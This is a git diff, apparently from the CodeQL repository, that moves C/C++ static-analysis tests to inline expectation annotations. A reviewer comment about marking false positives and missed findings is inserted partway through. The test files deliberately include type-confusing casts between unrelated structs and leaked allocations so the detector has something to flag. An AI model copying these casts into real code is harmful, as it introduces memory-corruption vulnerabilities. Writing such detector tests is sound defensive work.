@@ -104,13 +114,3 @@ nodes | test.cpp:226:13:226:18 | new | semmle.label | new | | test.cpp:227:29:227:63 | p | semmle.label | p | subpaths -#select -| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | -| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | -| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | -| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | -| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | -| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | -| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | -| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. 
| test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | -| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref index 53b17f1e1fda..b0034e45821a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-843/TypeConfusion.ql \ No newline at end of file +query: Security/CWE/CWE-843/TypeConfusion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp index 982496218ffa..00f56700d55a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/test.cpp @@ -24,13 +24,13 @@ void test2() { } void test3() { - void* p = new S1; - Not_S1_wrapper* s1w = static_cast(p); // BAD + void* p = new S1; // $ Source + Not_S1_wrapper* s1w = static_cast(p); // BAD // $ Alert } void test4() { - void* p = new Not_S1_wrapper; - S1* s1 = static_cast(p); // BAD + void* p = new Not_S1_wrapper; // $ Source + S1* s1 = static_cast(p); // BAD // $ Alert } struct HasBitFields { @@ -63,8 +63,8 @@ struct Dog : public Animal { }; void test6() { - Animal* a = new Cat; - Dog* d = static_cast(a); // BAD + Animal* a = new Cat; // $ Source + Dog* d = static_cast(a); // BAD // $ Alert } void test7() { @@ -124,8 +124,8 @@ struct Not_S2_prefix { }; void test11() { - S2* s2 = new S2; - Not_S2_prefix* s2p = reinterpret_cast(s2); // BAD + S2* s2 = new S2; // $ Source + Not_S2_prefix* s2p = reinterpret_cast(s2); // BAD // $ Alert } struct HasSomeBitFields { 
@@ -140,9 +140,9 @@ void test12() { S1* s1 = new S1; HasBitFields* hbf = reinterpret_cast(s1); // BAD [NOT DETECTED] - S1* s1_2 = new S1; + S1* s1_2 = new S1; // $ Source // This one has a non-bitfield members. So we detect the problem - HasSomeBitFields* hbf2 = reinterpret_cast(s1_2); // BAD + HasSomeBitFields* hbf2 = reinterpret_cast(s1_2); // BAD // $ Alert } void test13(bool b, Cat* c) { @@ -150,13 +150,13 @@ void test13(bool b, Cat* c) { if(b) { a = c; } else { - a = new Dog; + a = new Dog; // $ Source } // This FP happens despite the `not GoodFlow::flowTo(sinkNode)` condition in the query // because we don't find a flow path from `a = c` to `static_cast(a)` because // the "source" (i.e., `a = c`) doesn't have an allocation. if(b) { - Cat* d = static_cast(a); // GOOD [FALSE POSITIVE] + Cat* d = static_cast(a); // GOOD [FALSE POSITIVE] // $ Alert } } @@ -184,9 +184,9 @@ void test14() { struct UInt8_with_more { UInt8 u8; void* p; }; void test15() { - void* u64 = new UInt64; + void* u64 = new UInt64; // $ Source // ... - UInt8_with_more* u8 = (UInt8_with_more*)u64; // BAD + UInt8_with_more* u8 = (UInt8_with_more*)u64; // BAD // $ Alert } struct SingleInt { @@ -214,8 +214,8 @@ struct UnrelatedStructSize { }; void test17() { - void* p = new S1; - UnrelatedStructSize* uss = static_cast(p); // BAD + void* p = new S1; // $ Source + UnrelatedStructSize* uss = static_cast(p); // BAD // $ Alert } struct TooLargeBufferSize { @@ -223,8 +223,8 @@ struct TooLargeBufferSize { }; void test18() { - void* p = new S1; - TooLargeBufferSize* uss = static_cast(p); // BAD + void* p = new S1; // $ Source + TooLargeBufferSize* uss = static_cast(p); // BAD // $ Alert } // semmle-extractor-options: --gcc -std=c++11 \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref b/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref index b60eb7917224..d22b10044239 100644 --- a/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref 
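Review bot: The two known-inaccurate results in this file are not distinguished in the new inline expectations. In test12 the `// BAD [NOT DETECTED]` cast to `HasBitFields*` gets no annotation, and in test13 the `// GOOD [FALSE POSITIVE]` cast is recorded as a plain `// $ Alert`, which reads like a wanted finding. I would end those lines with `// BAD [NOT DETECTED] // $ MISSING: Alert` and `// GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert`, so the test reports when the type-confusion query starts catching the bit-field case or stops flagging the guarded cast. The same applies to the `[FALSE POSITIVE]` lines in original.cpp, ListDelete.cpp and Variants.cpp, and to the `[NOT DETECTED]`/`[NOT REPORTED]` lines in DeleteThis.cpp, PlacementNew.cpp and Variants.cpp later in this patch. The body of test12 begins above its hunk.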
+++ b/cpp/ql/test/query-tests/Summary/LinesOfCode.qlref @@ -1 +1 @@ -Summary/LinesOfCode.ql +query: Summary/LinesOfCode.ql diff --git a/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref b/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref index baaa947e6afa..99a6d1324943 100644 --- a/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref +++ b/cpp/ql/test/query-tests/Summary/LinesOfUserCode.qlref @@ -1 +1 @@ -Summary/LinesOfUserCode.ql +query: Summary/LinesOfUserCode.ql diff --git a/cpp/ql/test/query-tests/definitions/definitions.qlref b/cpp/ql/test/query-tests/definitions/definitions.qlref index 7b600c094b54..89fab02d1037 100644 --- a/cpp/ql/test/query-tests/definitions/definitions.qlref +++ b/cpp/ql/test/query-tests/definitions/definitions.qlref @@ -1 +1 @@ -definitions.ql +query: definitions.ql diff --git a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c index ff4e5ad15a47..1d63e5531a52 100644 --- a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c +++ b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.c @@ -408,7 +408,7 @@ void justStillGood(int x) { justStillGood(199); } -void bad(int x) { +void bad(int x) { // $ Alert bad(2); bad(3); bad(4); diff --git a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref index e2fb899048e0..e3c6654bd843 100644 --- a/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref +++ b/cpp/ql/test/query-tests/jsf/3.02 Code Size and Complexity/AV Rule 1/AV Rule 1.qlref @@ -1 +1,2 @@ -jsf/3.02 Code Size and Complexity/AV Rule 1.ql +query: jsf/3.02 Code Size and Complexity/AV Rule 1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref index b3267de7b8a9..36002b9e0459 100644 --- a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref +++ b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/AV Rule 13.qlref @@ -1 +1,2 @@ -jsf/4.04 Environment/AV Rule 13.ql +query: jsf/4.04 Environment/AV Rule 13.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp index cd11861c4ec6..4d87c501c8e8 100644 --- a/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.04 Environment/AV Rule 13/test.cpp @@ -2,9 +2,9 @@ int main() { const char *const_str = ""; - const wchar_t *const_wstr = L""; // BAD + const wchar_t *const_wstr = L""; // BAD // $ Alert char c = 'c'; - wchar_t wc = L'c'; // BAD + wchar_t wc = L'c'; // BAD // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref index 5ae78414335a..e06ec8cac8b6 100644 --- a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref +++ b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/AV Rule 32.qlref @@ -1 +1,2 @@ -jsf/4.06 Pre-Processing Directives/AV Rule 32.ql +query: jsf/4.06 Pre-Processing Directives/AV Rule 32.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c index 1c4bb4a99133..21f16d449b6e 100644 --- a/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c 
+++ b/cpp/ql/test/query-tests/jsf/4.06 Pre-Processing Directives/AV Rule 32/test.c @@ -1,4 +1,4 @@ #include "test.H" // GOOD #include "test.xpm" // GOOD -#include "test2.c" // BAD +#include "test2.c" // BAD // $ Alert #include "test.def" // GOOD diff --git a/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref b/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref index 57b4d1283c7f..729eeaf1071f 100644 --- a/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref +++ b/cpp/ql/test/query-tests/jsf/4.07 Header Files/AV Rule 35/AV Rule 35.qlref @@ -1 +1 @@ -jsf/4.07 Header Files/AV Rule 35.ql +query: jsf/4.07 Header Files/AV Rule 35.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref index a39a710f34e2..e7c382bff878 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.1.qlref @@ -1 +1,2 @@ -jsf/4.09 Style/AV Rule 53.1.ql +query: jsf/4.09 Style/AV Rule 53.1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref index 285ffc692c76..10d7349f3073 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 53.qlref @@ -1 +1 @@ -jsf/4.09 Style/AV Rule 53.ql +query: jsf/4.09 Style/AV Rule 53.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref index 5aae2758b1c9..813d3f75e641 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/AV Rule 54.qlref 
@@ -1 +1 @@ -jsf/4.09 Style/AV Rule 54.ql +query: jsf/4.09 Style/AV Rule 54.ql diff --git a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c index 47c2408c2fb9..1985c5ad67b8 100644 --- a/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c +++ b/cpp/ql/test/query-tests/jsf/4.09 Style/AV Rule 53 54/test.c @@ -1,4 +1,4 @@ #include "test" #include "test.abc" #include "test.H" -#include "test'.h" +#include "test'.h" // $ Alert[cpp/jsf/av-rule-53-1] diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp index bc21219cab82..dee5e477a80d 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.cpp @@ -1,7 +1,7 @@ class MyClass1 { public: - MyClass1() { // BAD + MyClass1() { // BAD // $ Alert x = 1; } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref index 6ed93402c8b4..60e5fd779888 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/AV Rule 73.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 73.ql +query: jsf/4.10 Classes/AV Rule 73.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp index 5c86702e2c26..d0c823c22121 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 73/original.cpp @@ -11,7 +11,7 @@ class Bad int cmp(const Bad& that); }; -Bad::Bad() : key(-1) // non-compliant +Bad::Bad() : key(-1) // non-compliant // $ Alert { } 
@@ -73,7 +73,7 @@ class AlsoGood char getChar(); }; -AlsoGood::AlsoGood() // compliant [FALSE POSITIVE] +AlsoGood::AlsoGood() // compliant [FALSE POSITIVE] // $ Alert { cp = 0; } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref index a878bda77997..d314f74ada73 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/AV Rule 76.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 76.ql +query: jsf/4.10 Classes/AV Rule 76.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp index 0c5e40e7b912..b90069862a29 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 76/test.cpp @@ -2,7 +2,7 @@ class Class1 // good: no pointer members, default assignment operator and copy c { }; -class Class2 // bad: pointer members, default assignment operator and copy constructor +class Class2 // bad: pointer members, default assignment operator and copy constructor // $ Alert { private: int* _a; @@ -13,7 +13,7 @@ class Class2 // bad: pointer members, default assignment operator and copy const } }; -class Class3 // bad: pointer members, custom assignment operator and default copy constructor +class Class3 // bad: pointer members, custom assignment operator and default copy constructor // $ Alert { private: int* _a; @@ -30,7 +30,7 @@ class Class3 // bad: pointer members, custom assignment operator and default cop } }; -class Class4 // bad: pointer members, default assignment operator and custom copy constructor +class Class4 // bad: pointer members, default assignment operator and custom copy constructor // $ Alert { private: int* _a; 
diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref index 5fe2b71b701b..7ccb2e198843 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/AV Rule 77.1.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 77.1.ql +query: jsf/4.10 Classes/AV Rule 77.1.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp index e9e917c840fb..ceeb03948e8c 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 77.1/test.cpp @@ -7,7 +7,7 @@ class C2 { }; class C3 { - C3(const C3& c, int i = 1); // error + C3(const C3& c, int i = 1); // error // $ Alert }; namespace templates { diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp index 7612ac07c8ce..e2b79ae37bf0 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.cpp @@ -53,7 +53,7 @@ struct Base_Virtual_VirtualDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtor +struct Base_Virtual_NonVirtualDtor // $ Alert { ~Base_Virtual_NonVirtualDtor(); virtual void VirtualFunction(); @@ -65,7 +65,7 @@ struct Base_Virtual_ImplicitDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtorWithDefinition +struct Base_Virtual_NonVirtualDtorWithDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithDefinition(); virtual void VirtualFunction(); 
@@ -75,7 +75,7 @@ Base_Virtual_NonVirtualDtorWithDefinition::~Base_Virtual_NonVirtualDtorWithDefin { } -struct Base_Virtual_NonVirtualDtorWithInlineDefinition +struct Base_Virtual_NonVirtualDtorWithInlineDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithInlineDefinition() { diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref index 419d3f69cc58..6c416c54edfe 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 78/AV Rule 78.qlref @@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 78.ql +query: jsf/4.10 Classes/AV Rule 78.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp index 6fb9815dd742..d2267748984d 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.cpp 
@@ -43,23 +43,23 @@ class MyClass MyClass() { myPtr1 = new int; // GOOD - myPtr2 = new int; // BAD: not deleted in destructor + myPtr2 = new int; // BAD: not deleted in destructor // $ Alert myPtr3 = (int *)malloc(sizeof(int)); // GOOD - myPtr4 = (int *)malloc(sizeof(int)); // BAD: not freed in destructor - myPtr5 = new int; // BAD: deleted in close but not in destructor - myPtr6 = (int *)malloc(sizeof(int)); // BAD: freed in close but not in destructor + myPtr4 = (int *)malloc(sizeof(int)); // BAD: not freed in destructor // $ Alert + myPtr5 = new int; // BAD: deleted in close but not in destructor // $ Alert + myPtr6 = (int *)malloc(sizeof(int)); // BAD: freed in close but not in destructor // $ Alert myAutoPtr = new int; // GOOD myFile1 = fopen("file1.txt", "rt"); // GOOD - myFile2 = fopen("file2.txt", "rt"); // BAD: not closed in destructor + myFile2 = fopen("file2.txt", "rt"); // BAD: not closed in destructor // $ Alert - myArray1 = (int *)calloc(100, sizeof(int)); // BAD: not freed in destructor - myArray2 = new int[100]; // BAD: not deleted in destructor + myArray1 = (int *)calloc(100, sizeof(int)); // BAD: not freed in destructor // $ Alert + myArray2 = new int[100]; // BAD: not deleted in destructor // $ Alert myArray3 = new int[100]; // GOOD: deleted in destructor myPtr7 = (int*)realloc(0, sizeof(int)); // GOOD: freed below (assuming the realloc succeeds) - myPtr8 = (int*)realloc(myPtr7, sizeof(int)); // BAD: not freed in destructor + myPtr8 = (int*)realloc(myPtr7, sizeof(int)); // BAD: not freed in destructor // $ Alert } ~MyClass() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref index 34b54bccd467..23a70aede929 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/AV Rule 79.qlref 
@@ -1 +1,2 @@ -jsf/4.10 Classes/AV Rule 79.ql +query: jsf/4.10 Classes/AV Rule 79.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp index 6961a8d35526..84216aa838cb 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Container2.cpp @@ -18,7 +18,7 @@ class Container2 void Alloc() { ptr2 = new T(); // GOOD - ptr3 = new T(); // BAD: not deleted in destructor + ptr3 = new T(); // BAD: not deleted in destructor // $ Alert } void Free() diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp index fc7ad7de26d3..3e4456daf9bf 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/DeleteThis.cpp @@ -53,11 +53,11 @@ class MyClass3 ptr3 = new MyClass2(); // GOOD ptr4 = new MyClass2(); // GOOD ptr5 = new MyClass2(); // GOOD - ptr10 = new MyClass2(); // BAD: not deleted in destructor + ptr10 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr11 = new MyClass2(); // GOOD - ptr12 = new MyClass2(); // BAD: not deleted in destructor + ptr12 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr13 = new MyClass2(); // GOOD - ptr14 = new MyClass2(); // BAD: not deleted in destructor + ptr14 = new MyClass2(); // BAD: not deleted in destructor // $ Alert ptr15 = new MyClass2(); // GOOD ptr20 = new MyClass2(); // GOOD } @@ -124,7 +124,7 @@ class MyClass9 b = new MyClass5(); // GOOD c = new MyClass6(); // GOOD - d = new MyClass7(); // BAD + d = new MyClass7(); // BAD // $ Alert e = new MyClass7(); // BAD [NOT DETECTED] f = new MyClass8(); // BAD [NOT DETECTED] } 
diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp index bdec96f30df4..89d298c299d4 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ExternalOwners.cpp @@ -46,7 +46,7 @@ class MyScreen public: MyScreen() { - a = new MyWidget(); // BAD (not deleted) + a = new MyWidget(); // BAD (not deleted) // $ Alert b = new MyWidget(); // GOOD (deleted in widgets destructor) widgets.add(b); diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp index 1b3233c52718..c0b70ee2c172 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/Lambda.cpp @@ -21,7 +21,7 @@ class testLambda }; deleter3(); - r4 = new char[4096]; // BAD + r4 = new char[4096]; // BAD // $ Alert r5 = new char[4096]; // GOOD deleter5 = &deleter_for_r5; diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp index bbea9da6f430..ad74ea69e26e 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/ListDelete.cpp @@ -18,7 +18,7 @@ class MyThingColection { public: MyThingColection() { - first = new MyThing; // GOOD (all deleted in destructor) [FALSE POSITIVE] + first = new MyThing; // GOOD (all deleted in destructor) [FALSE POSITIVE] // $ Alert first->next = new MyThing; // GOOD (all deleted in destructor) diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp index f5d2b02efaa8..03dfbc62b45a 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp 
+++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/NoDestructor.cpp @@ -20,7 +20,7 @@ class MyClass5 public: MyClass5() { - n = new MyNumber(); // BAD: not deleted + n = new MyNumber(); // BAD: not deleted // $ Alert } private: diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp index c7794857cb94..68ec8e199520 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/PlacementNew.cpp @@ -33,7 +33,7 @@ class MyTestForPlacementNew { void *buffer_ptr = buffer; - p1 = new MyClassForPlacementNew(1); // BAD: not released + p1 = new MyClassForPlacementNew(1); // BAD: not released // $ Alert p2 = new (std::nothrow) MyClassForPlacementNew(2); // BAD: not released [NOT DETECTED] p3 = new (buffer_ptr) MyClassForPlacementNew(3); // GOOD: placement new, not an allocation } diff --git a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp index 75ad7f4d1fa0..013eb6398e71 100644 --- a/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 79/SelfRegistering.cpp +++ b/cpp/ql/test/query-tests/jsf/4.10 Classes/AV Rule 